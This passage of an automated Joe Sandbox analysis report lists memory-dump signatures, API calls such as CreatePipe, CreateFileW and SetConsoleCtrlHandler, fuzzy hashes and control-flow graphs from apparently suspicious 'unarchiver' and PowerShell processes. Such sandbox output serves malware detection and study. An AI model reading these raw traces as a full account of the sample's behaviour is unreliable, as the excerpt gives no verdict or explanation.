        • Instruction Fuzzy Hash: 411173755093809FD7128B29DC85A52FFB4EF56320F09C4EBDD858B263C279A848CB62
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • SetErrorMode.KERNELBASE(?), ref: 00A2A290
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: ErrorMode
        • String ID:
        • API String ID: 2340568224-0
        • Opcode ID: f2a286ac6ef4ff0aa956bb774f3bea0ba20a123001cd03595425296c3ed9b33b
        • Instruction ID: f0f25eea2536a0d586a9e0847b55fcc59c79212bdd3c40b97fff7a41b3415463
        • Opcode Fuzzy Hash: f2a286ac6ef4ff0aa956bb774f3bea0ba20a123001cd03595425296c3ed9b33b
        • Instruction Fuzzy Hash: CE1165714093849FDB128B15DC84B62FFB4DF56725F0884DAED858B263D275A808CB72
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • FindNextFileW.KERNELBASE(?,00000E2C,?,?), ref: 00A2A1C2
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: FileFindNext
        • String ID:
        • API String ID: 2029273394-0
        • Opcode ID: 0adb5557a16fbcde6a78df74d292506ffefe18230be50479e5254086a524cdd7
        • Instruction ID: 07ccd9e42aa26732f6932727f7f8f75ae96be3a3ab80b680e15d66ceb7c1ac97
        • Opcode Fuzzy Hash: 0adb5557a16fbcde6a78df74d292506ffefe18230be50479e5254086a524cdd7
        • Instruction Fuzzy Hash: 3501D471500200ABD710DF26DC86B26FBA8FF88B20F14C16AED088B741D235F515CBE1
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • CreatePipe.KERNELBASE(?,00000E2C,?,?), ref: 00A2AAA2
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: CreatePipe
        • String ID:
        • API String ID: 2719314638-0
        • Opcode ID: c481c1b55fbed2b6324bc8d62e8b9d72413681050cd0bf8206a000b2eb476c3d
        • Instruction ID: bac45846c48f98d342d2796487f2fa2e6e2d58ee3af537d4cd367f66577cf591
        • Opcode Fuzzy Hash: c481c1b55fbed2b6324bc8d62e8b9d72413681050cd0bf8206a000b2eb476c3d
        • Instruction Fuzzy Hash: A701D471500200ABD750DF26DC86B26FBA8FF88B20F14C16AED088B741D231F515CBE1
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • FindCloseChangeNotification.KERNELBASE(?), ref: 00A2A674
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: ChangeCloseFindNotification
        • String ID:
        • API String ID: 2591292051-0
        • Opcode ID: d3db25d5dcbfae4f599d4570be629b092e06aad108f454ebcdeee760b22c4ad1
        • Instruction ID: 5065ff284e40dc67acc39f372665e9b4a778accb71ecfdf7e9f008fbc9a7a929
        • Opcode Fuzzy Hash: d3db25d5dcbfae4f599d4570be629b092e06aad108f454ebcdeee760b22c4ad1
        • Instruction Fuzzy Hash: F1018F719002409FDB518F29E885766FBA4EF54320F18C4BADD498B756D779E408CE62
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: CloseFind
        • String ID:
        • API String ID: 1863332320-0
        • Opcode ID: 15ae8255d55b891de081a19d3d46564766f1675ef20471edce54da2e41829edf
        • Instruction ID: dc35bc976e24ddff40b61ae119babb8d96792c428e847e5dfc673fe87d517eb2
        • Opcode Fuzzy Hash: 15ae8255d55b891de081a19d3d46564766f1675ef20471edce54da2e41829edf
        • Instruction Fuzzy Hash: 1301F4755002508FDB208F19EC85765FBA4EF14320F08C0EADD458B352D279E809DFA2
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • SetErrorMode.KERNELBASE(?), ref: 00A2A290
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: ErrorMode
        • String ID:
        • API String ID: 2340568224-0
        • Opcode ID: 18ace328fbafb7af4915657e0ccb163a8c9ca388f0977aad9b15a72e51592695
        • Instruction ID: 5dd6d7d717cb7f3cc9da0cf34007f94c392144c1bc36ba6da47d26e41507b25d
        • Opcode Fuzzy Hash: 18ace328fbafb7af4915657e0ccb163a8c9ca388f0977aad9b15a72e51592695
        • Instruction Fuzzy Hash: D1F0A435904240CFDB60CF09E985761FBA0EF18721F18C4EADD454B366D2BAA408CFA2
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.418228012.0000000000DD0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_dd0000_unarchiver.jbxd
        Similarity
        • API ID:
        • String ID: ZRwP
        • API String ID: 0-3789124801
        • Opcode ID: 353d66c773468837d2ab0246287e6ff66ffb456cf42bb411dc3c80a5ac6fde75
        • Instruction ID: c0e75f3ad08f71daf5197cd22847452e4ada20acd77f603eae833751f83d23d6
        • Opcode Fuzzy Hash: 353d66c773468837d2ab0246287e6ff66ffb456cf42bb411dc3c80a5ac6fde75
        • Instruction Fuzzy Hash: A701D4B24096446FC301CB15EC41857BBF8EF86620B09C5AFEC488B202E265A918CBE2
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.418228012.0000000000DD0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_dd0000_unarchiver.jbxd
        Similarity
        • API ID:
        • String ID: ZRwP
        • API String ID: 0-3789124801
        • Opcode ID: e50a6cfd5befaf1aa0bbb8ad027302fbfc13a5c07da7f193ff932b1284ebeab1
        • Instruction ID: d8bee01e2a652f7c3885f01e3bbb0066f985fd10487786c00d2e5a1b9384984c
        • Opcode Fuzzy Hash: e50a6cfd5befaf1aa0bbb8ad027302fbfc13a5c07da7f193ff932b1284ebeab1
        • Instruction Fuzzy Hash: 84F082B29052046FD240DF09EC41856F7ECEF84621F14C56EEC488B301E276A9144AE2
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.418274670.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_ee0000_unarchiver.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 73aedaf5420277d4d7a716e497cc1486e9dec20aa083b657051fd28cfd9bf0ae
        • Instruction ID: c662007647a19fc75e8e6870f344d85d6eb33592a5d913e9c1a62d8762a3f689
        • Opcode Fuzzy Hash: 73aedaf5420277d4d7a716e497cc1486e9dec20aa083b657051fd28cfd9bf0ae
        • Instruction Fuzzy Hash: 54510674E42218DFCB18DFB5D580AAEBBB2FF89704F205429E405B7394DB359942CB58
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.418274670.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_ee0000_unarchiver.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: bdfed45adccb818f655f0f5f61a3604bd7a5259589cd4d84bcfaf10efcee60d4
        • Instruction ID: d24852c9a2b252f1ebb3185bf3d1a790a4a43a03c74b5825d3bd6dfb6da523c0
        • Opcode Fuzzy Hash: bdfed45adccb818f655f0f5f61a3604bd7a5259589cd4d84bcfaf10efcee60d4
        • Instruction Fuzzy Hash: 74512674E42219DFCB18DFB5D980AAEBBB2FF89304F205429D405B7394DB399942CB58
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.418274670.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_ee0000_unarchiver.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: b934a75c3d0dd30011c5f979c4d583506f1a4a5a3097dfbde9623403fbf4f986
        • Instruction ID: 650ea987b77480de0d501ce699e1a8c4ff93bc41623248278e627854608bf498
        • Opcode Fuzzy Hash: b934a75c3d0dd30011c5f979c4d583506f1a4a5a3097dfbde9623403fbf4f986
        • Instruction Fuzzy Hash: BC212875D01108CFCB04EFA4D984AEDBBB1FB89318F10952AD901B3264DB706A46CB94
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.418274670.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_ee0000_unarchiver.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3db3cf4b75a356df857517263212ea19b9f58823aea5372d749a5d432c63358c
        • Instruction ID: c6bc757752c19ee3ac05da29e110042b21483b35877464cd6c47d3c52db44215
        • Opcode Fuzzy Hash: 3db3cf4b75a356df857517263212ea19b9f58823aea5372d749a5d432c63358c
        • Instruction Fuzzy Hash: 8D210735D01109DFCB04EFA5D944AEEFBB6FB89314F10952AD901B3264DB706A46CF94
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.418228012.0000000000DD0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_dd0000_unarchiver.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: db4193e04117e2fd8adbe2e9bade76413cd6cc29862e18e7d2eb04bede62993d
        • Instruction ID: b29e46946b2034e6d94750e9ab686eebbbb7f25a4616494d604fd913f9d9e277
        • Opcode Fuzzy Hash: db4193e04117e2fd8adbe2e9bade76413cd6cc29862e18e7d2eb04bede62993d
        • Instruction Fuzzy Hash: 7F01D6B65087805FD7118B06EC40862FFE8EF86220709C09BEC498B612D225A909CBB2
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.418274670.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_ee0000_unarchiver.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a5d7b33791c928960c76b732d95b910ba82d08573136abf746fb89204934fd3d
        • Instruction ID: b787c9d1ae5a354ba6a51a8e01da5da23f6063e269a02f259b8eaa37ab0f58b6
        • Opcode Fuzzy Hash: a5d7b33791c928960c76b732d95b910ba82d08573136abf746fb89204934fd3d
        • Instruction Fuzzy Hash: 3B014870D412498FCB04EFB0C4817BEBBB1EB02325F1069A9C401B7291C7785A86CB90
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.418274670.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_ee0000_unarchiver.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 740c80e861ed95b6dd5b5d595ea5d7483811610b1a41d31bc5559a3c6d050f74
        • Instruction ID: 5c6374d594f1036b0956b58deb67b6288a0e575190aadf52864a83b206872500
        • Opcode Fuzzy Hash: 740c80e861ed95b6dd5b5d595ea5d7483811610b1a41d31bc5559a3c6d050f74
        • Instruction Fuzzy Hash: F001EF74D0225DDFCB08EFB4C4457BEBBB1BB46315F20A9A9C40177290DBB49A80CB98
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.418274670.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_ee0000_unarchiver.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: f4a6ab562da346e781000e4c7168a68d8abdfc95d3908737f3c1bac9fee04b5a
        • Instruction ID: ce59bc42897a6fccc7852ee62b0b99587557d9a4f50635f4f6255cf881e5053e
        • Opcode Fuzzy Hash: f4a6ab562da346e781000e4c7168a68d8abdfc95d3908737f3c1bac9fee04b5a
        • Instruction Fuzzy Hash: 69F0A4B8D0520EEBCB44DFA9C5405AEBBF6AF89300F2095A9D818B3314DB715B41DB91
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.418274670.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_ee0000_unarchiver.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: b9480ed9503618a7b6f14bf67d818117f37717832e0a9a714d7bbeeab228db55
        • Instruction ID: e6522c76c8696ab86e85aee06af1b7e601ef32c0303135edf961487ee915bed9
        • Opcode Fuzzy Hash: b9480ed9503618a7b6f14bf67d818117f37717832e0a9a714d7bbeeab228db55
        • Instruction Fuzzy Hash: E3F049B4D0424ADFCB40DFA4C1805EEBFB0AF46210F2055AAD414B7300D6315B42DB41
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.418228012.0000000000DD0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_dd0000_unarchiver.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a285587166555156674d1568fd380fcc0d645024e96256ec9ccd4991ea990215
        • Instruction ID: 94ee6cc9854f074d653acb1f5c64ba39fd1d5d48f6cc98e801879041297d074d
        • Opcode Fuzzy Hash: a285587166555156674d1568fd380fcc0d645024e96256ec9ccd4991ea990215
        • Instruction Fuzzy Hash: 84E06DB66046004BD650CF0AEC41452F7D8EB88631718C06BDC0D8B701D675B5058EA5
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.418065827.0000000000A22000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A22000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a22000_unarchiver.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 21fb6f6639a1f0449b05143d4412742d76ca5147e3ee2632e3f6edc80c6dc225
        • Instruction ID: e8dc4adc4119eb5fb9d70e863a6bd3dc9e1061e10eb0bfdf73d4f61e1dbe7c15
        • Opcode Fuzzy Hash: 21fb6f6639a1f0449b05143d4412742d76ca5147e3ee2632e3f6edc80c6dc225
        • Instruction Fuzzy Hash: 26D05E79245A915FD326AB1CD1A8B993B94AB52B04F4644FAE8408B763C368D981D610
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.418065827.0000000000A22000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A22000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a22000_unarchiver.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c0cad642e23b5765f8a2b93ef8ca781104db724dfade37b79f119ac6c0b2be37
        • Instruction ID: a2cac0e0a4ee0abfc9aa155614ff3c105f52799b6afbdd50bd736b4b32c51141
        • Opcode Fuzzy Hash: c0cad642e23b5765f8a2b93ef8ca781104db724dfade37b79f119ac6c0b2be37
        • Instruction Fuzzy Hash: 8BD05E342002814BD729DB1CD194F5937D4AF41B00F0644F8AC008F262C3B8DC81C600
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.418274670.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_ee0000_unarchiver.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 48ab669e43e5774a118251e53339a62b1209ef06487ca9fae60f63f8febc1b5f
        • Instruction ID: 94d891a0e196e0af9d1d04fe1872bb3a7a0dc8028c68f5e1b1b8105bff5aa6bd
        • Opcode Fuzzy Hash: 48ab669e43e5774a118251e53339a62b1209ef06487ca9fae60f63f8febc1b5f
        • Instruction Fuzzy Hash: 4E91D57AD51218EFDB14DFE5E844B99BBB2FB89301F108565E80AA7368CB305E46CF50
        Uniqueness

        Uniqueness Score: -1.00%

        Execution Graph

        Execution Coverage:9.7%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:0%
        Total number of Nodes:111
        Total number of Limit Nodes:9
        execution_graph 29515 11639b0 29516 11639b9 29515->29516 29517 11639bf 29516->29517 29519 11644e7 29516->29519 29521 1164494 29519->29521 29522 11644f7 29519->29522 29520 11644c3 29520->29517 29521->29520 29524 1169858 29521->29524 29522->29522 29525 116984a 29524->29525 29527 11697fa 29524->29527 29525->29524 29526 1169888 29525->29526 29529 11698ab 29525->29529 29532 1169858 GetFileAttributesW 29525->29532 29534 11698b8 29525->29534 29526->29520 29527->29520 29528 11698e5 29528->29520 29529->29528 29539 1167698 29529->29539 29532->29525 29535 11698d0 29534->29535 29536 11698e5 29535->29536 29537 1167698 GetFileAttributesW 29535->29537 29536->29525 29538 1169916 29537->29538 29538->29525 29541 1169d00 GetFileAttributesW 29539->29541 29542 1169916 29541->29542 29542->29520 29543 1160dd0 29544 1160df1 29543->29544 29548 116d5f0 29544->29548 29555 116d5e0 29544->29555 29545 1160fcd 29549 116d61f 29548->29549 29550 116d601 29548->29550 29554 116d618 29550->29554 29562 116e700 29550->29562 29567 116e757 29550->29567 29572 116e6f0 29550->29572 29554->29545 29556 116d601 29555->29556 29557 116d61f 29555->29557 29558 116d618 29556->29558 29559 116e757 3 API calls 29556->29559 29560 116e700 3 API calls 29556->29560 29561 116e6f0 3 API calls 29556->29561 29558->29545 29559->29558 29560->29558 29561->29558 29563 116e728 29562->29563 29577 7c87f68 29563->29577 29582 7c87f59 29563->29582 29564 116e7a0 29568 116e75c 29567->29568 29570 7c87f68 3 API calls 29568->29570 29571 7c87f59 3 API calls 29568->29571 29569 116e7a0 29570->29569 29571->29569 29573 116e728 29572->29573 29575 7c87f68 3 API calls 29573->29575 29576 7c87f59 3 API calls 29573->29576 29574 116e7a0 29575->29574 29576->29574 29578 7c87f7a 29577->29578 29587 7c88000 29578->29587 29593 7c87ff0 29578->29593 29579 7c87feb 29579->29564 29583 7c87f7a 29582->29583 29585 7c88000 2 API calls 29583->29585 29586 7c87ff0 2 API calls 29583->29586 29584 7c87feb 29584->29564 29585->29584 29586->29584 29600 7c8727c 29587->29600 29589 7c88014 29589->29579 29591 7c880b6 SetConsoleCtrlHandler 29592 7c880f2 29591->29592 29592->29579 29594 7c88000 29593->29594 29595 7c8727c SetConsoleCtrlHandler 29594->29595 29597 7c88010 29595->29597 29596 7c88014 29596->29579 29597->29596 29598 7c880b6 SetConsoleCtrlHandler 29597->29598 29599 7c880f2 29598->29599 29599->29579 29601 7c88060 SetConsoleCtrlHandler 29600->29601 29603 7c88010 29601->29603 29603->29589 29603->29591 29604 1162188 29605 116219a 29604->29605 29609 1164278 29605->29609 29614 1164268 29605->29614 29606 11621c9 29610 1164282 29609->29610 29613 11642a7 29610->29613 29619 1164330 29610->29619 29625 1164321 29610->29625 29613->29606 29615 1164282 29614->29615 29616 11642a7 29615->29616 29617 1164330 GetFileAttributesW 29615->29617 29618 1164321 GetFileAttributesW 29615->29618 29616->29606 29617->29616 29618->29616 29620 1164343 29619->29620 29622 11644e7 GetFileAttributesW 29620->29622 29631 11643a8 29620->29631 29637 1164398 29620->29637 29621 1164361 29621->29613 29622->29621 29626 1164343 29625->29626 29628 11644e7 GetFileAttributesW 29626->29628 29629 1164398 GetFileAttributesW 29626->29629 29630 11643a8 GetFileAttributesW 29626->29630 29627 1164361 29627->29613 29628->29627 29629->29627 29630->29627 29633 11643bd 29631->29633 29632 11644c3 29632->29621 29633->29632 29634 1164482 29633->29634 29635 1169858 GetFileAttributesW 29633->29635 29634->29632 29636 1169858 GetFileAttributesW 29634->29636 29635->29634 29636->29632 29638 11643bd 29637->29638 29639 1164482 29638->29639 29640 11644c3 29638->29640 29642 1169858 GetFileAttributesW 29638->29642 29639->29640 29641 1169858 GetFileAttributesW 29639->29641 29640->29621 29641->29640 29642->29639 29643 116dea8 29649 116d69c 29643->29649 29645 116dedd 29647 116dfa4 CreateFileW 29648 116dfe1 29647->29648 29650 116df50 CreateFileW 29649->29650 29652 116dec7 29650->29652 29652->29645 29652->29647

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 1883 7cb9c00-7cb9c3f 1885 7cba5bd-7cba68c 1883->1885 1886 7cb9c45-7cb9c87 1883->1886 1893 7cb9c8d-7cb9d20 1886->1893 1894 7cb9ec0-7cb9ef3 1886->1894 1953 7cb9e9f-7cb9ebd 1893->1953 1954 7cb9d26-7cb9d41 1893->1954 1903 7cb9ffa-7cba010 1894->1903 1904 7cb9ef9-7cb9f5c 1894->1904 1909 7cba01e-7cba04d 1903->1909 1910 7cba012-7cba018 1903->1910 1948 7cb9fe2-7cb9ff7 1904->1948 1949 7cb9f62-7cb9f7a 1904->1949 1925 7cba04f-7cba06a call 7cb95d0 1909->1925 1926 7cba085-7cba0c9 call 7cb95d0 1909->1926 1910->1909 1912 7cba0cc-7cba10d call 7cb95d0 1910->1912 1935 7cba14f-7cba176 1912->1935 1936 7cba10f-7cba137 1912->1936 1942 7cba182-7cba188 1935->1942 1936->1935 1959 7cba139-7cba144 1936->1959 1943 7cba18a-7cba198 1942->1943 1944 7cba19e-7cba1a4 1942->1944 1943->1944 1962 7cba27a-7cba280 1943->1962 1950 7cba1ba-7cba1c6 1944->1950 1951 7cba1a6-7cba1b4 1944->1951 1948->1903 1956 7cb9f8d-7cb9f97 1949->1956 1957 7cb9f7c-7cb9f80 1949->1957 1971 7cba1c8-7cba1fa 1950->1971 1972 7cba212-7cba21e 1950->1972 1951->1950 1951->1962 1953->1894 1960 7cb9d43-7cb9d47 1954->1960 1961 7cb9d57-7cb9d64 1954->1961 1977 7cb9f99-7cb9f9f 1956->1977 1978 7cb9faf-7cb9fb5 1956->1978 1957->1956 1963 7cb9f82-7cb9f85 1957->1963 1973 7cba14d 1959->1973 1960->1961 1969 7cb9d49-7cb9d4f 1960->1969 1981 7cb9d7c-7cb9d82 1961->1981 1982 7cb9d66-7cb9d6c 1961->1982 1967 7cba49b-7cba4a1 1962->1967 1968 7cba286-7cba2eb 1962->1968 1963->1956 1974 7cba59e-7cba5a5 1967->1974 1975 7cba4a7-7cba4fe 1967->1975 2023 7cba2f1-7cba305 1968->2023 2024 7cba444-7cba465 1968->2024 1969->1961 1971->1972 2007 7cba1fc-7cba20c 1971->2007 1972->1962 1989 7cba220-7cba252 1972->1989 1973->1942 2026 7cba500-7cba521 1975->2026 2027 7cba554-7cba569 1975->2027 1983 7cb9fa3-7cb9fa5 1977->1983 1984 7cb9fa1 1977->1984 1986 7cb9fc2-7cb9fe0 1978->1986 1987 7cb9fb7-7cb9fbb 1978->1987 1992 7cb9d8f-7cb9da6 1981->1992 1993 7cb9d84-7cb9d88 1981->1993 1990 7cb9d6e 1982->1990 1991 7cb9d70-7cb9d72 1982->1991 1983->1978 1984->1978 1986->1948 1986->1949 1987->1986 1994 7cb9fbd-7cb9fbf 1987->1994 1989->1962 2017 7cba254-7cba26a 1989->2017 1990->1981 1991->1981 2003 7cb9e8a-7cb9e99 1992->2003 2004 7cb9dac-7cb9df1 1992->2004 1993->1992 1997 7cb9d8a-7cb9d8c 1993->1997 1994->1986 1997->1992 2003->1953 2003->1954 2039 7cb9e5a-7cb9e6f 2004->2039 2040 7cb9df3-7cb9dfa 2004->2040 2007->1972 2017->1962 2029 7cba3cb-7cba3ef 2023->2029 2030 7cba30b-7cba326 2023->2030 2024->1967 2036 7cba539-7cba552 2026->2036 2037 7cba523-7cba529 2026->2037 2027->1974 2047 7cba409-7cba43e 2029->2047 2048 7cba3f1-7cba3f7 2029->2048 2030->2029 2038 7cba32c-7cba372 2030->2038 2036->2026 2036->2027 2043 7cba52b 2037->2043 2044 7cba52d-7cba52f 2037->2044 2073 7cba3b3-7cba3c8 2038->2073 2074 7cba374-7cba381 2038->2074 2039->2003 2045 7cb9e0d-7cb9e17 2040->2045 2046 7cb9dfc-7cb9e00 2040->2046 2043->2036 2044->2036 2055 7cb9e19-7cb9e1f 2045->2055 2056 7cb9e2f-7cb9e35 2045->2056 2046->2045 2051 7cb9e02-7cb9e05 2046->2051 2047->2023 2047->2024 2052 7cba3fb-7cba407 2048->2052 2053 7cba3f9 2048->2053 2051->2045 2052->2047 2053->2047 2061 7cb9e23-7cb9e25 2055->2061 2062 7cb9e21 2055->2062 2063 7cb9e42-7cb9e58 2056->2063 2064 7cb9e37-7cb9e3b 2056->2064 2061->2056 2062->2056 2063->2039 2063->2040 2064->2063 2066 7cb9e3d-7cb9e3f 2064->2066 2066->2063 2073->2029 2077 7cba399-7cba3b1 2074->2077 2078 7cba383-7cba389 2074->2078 2077->2073 2077->2074 2079 7cba38b 2078->2079 2080 7cba38d-7cba38f 2078->2080 2079->2077 2080->2077
        Strings
        Memory Dump Source
        • Source File: 00000016.00000002.520684914.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_7cb0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: HJ
        • API String ID: 0-775665175
        • Opcode ID: fca7196cf719d5fe0692545f86d05a8c30fcf6ff5f3e75e2c223cfd400d08ed9
        • Instruction ID: 84b311f708157752213953be339e90b6464ca16b088b607614662dda42039db2
        • Opcode Fuzzy Hash: fca7196cf719d5fe0692545f86d05a8c30fcf6ff5f3e75e2c223cfd400d08ed9
        • Instruction Fuzzy Hash: CC524EB0600219DFDB24DF64C890BEE77B2EF89304F1185A9E909AB790DB35ED45CB91
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 1257 7cb54f0-7cb5529 1259 7cb552b-7cb552e 1257->1259 1260 7cb554a-7cb5551 1257->1260 1261 7cb553a-7cb553e 1259->1261 1262 7cb5530 1259->1262 1263 7cb5992-7cb59a9 1260->1263 1264 7cb5557-7cb555b 1260->1264 1261->1260 1265 7cb5540-7cb5549 1261->1265 1262->1261 1267 7cb59b0-7cb59bf 1263->1267 1266 7cb5561-7cb556f 1264->1266 1264->1267 1271 7cb59ce-7cb5a14 1266->1271 1272 7cb5575-7cb5605 call 7cb50bc 1266->1272 1274 7cb59c6-7cb59cd 1267->1274 1271->1274 1284 7cb5a16-7cb5a98 1271->1284 1292 7cb58db-7cb58ee 1272->1292 1293 7cb560b-7cb561c 1272->1293 1274->1271 1295 7cb58f6-7cb58fb 1292->1295 1296 7cb585f-7cb5884 1293->1296 1297 7cb5622-7cb5692 1293->1297 1298 7cb58fd 1295->1298 1299 7cb5906-7cb590b 1295->1299 1307 7cb588a-7cb589b 1296->1307 1308 7cb57a4-7cb57bb 1296->1308 1328 7cb5698-7cb56c0 1297->1328 1329 7cb57fe-7cb5823 1297->1329 1298->1299 1300 7cb590d-7cb5910 call 7cb50c8 1299->1300 1301 7cb5915 1299->1301 1300->1301 1301->1263 1314 7cb58a3-7cb58ad 1307->1314 1317 7cb57c2-7cb57d9 1308->1317 1318 7cb58bb 1314->1318 1319 7cb58af-7cb58b9 1314->1319 1327 7cb57e0-7cb57f7 1317->1327 1321 7cb58bd-7cb58d6 1318->1321 1319->1321 1323 7cb576e-7cb5781 1321->1323 1323->1295 1327->1329 1328->1327 1336 7cb56c6-7cb56c8 1328->1336 1337 7cb5829-7cb5839 1329->1337 1338 7cb5786-7cb579d 1329->1338 1336->1317 1339 7cb56ce-7cb56d5 1336->1339 1344 7cb5841-7cb5844 1337->1344 1338->1308 1342 7cb56dd-7cb56e6 1339->1342 1343 7cb56ec-7cb56ef 1342->1343 1342->1344 1346 7cb5850-7cb5853 1343->1346 1347 7cb56f5-7cb56f9 1343->1347 1344->1346 1346->1296 1348 7cb56fb-7cb56fe 1347->1348 1349 7cb5702-7cb5711 1347->1349 1348->1349 1349->1323 1350 7cb5713-7cb5743 1349->1350 1350->1323 1354 7cb5745-7cb5752 1350->1354 1354->1314 1356 7cb5758-7cb576b 1354->1356 1356->1323
        Strings
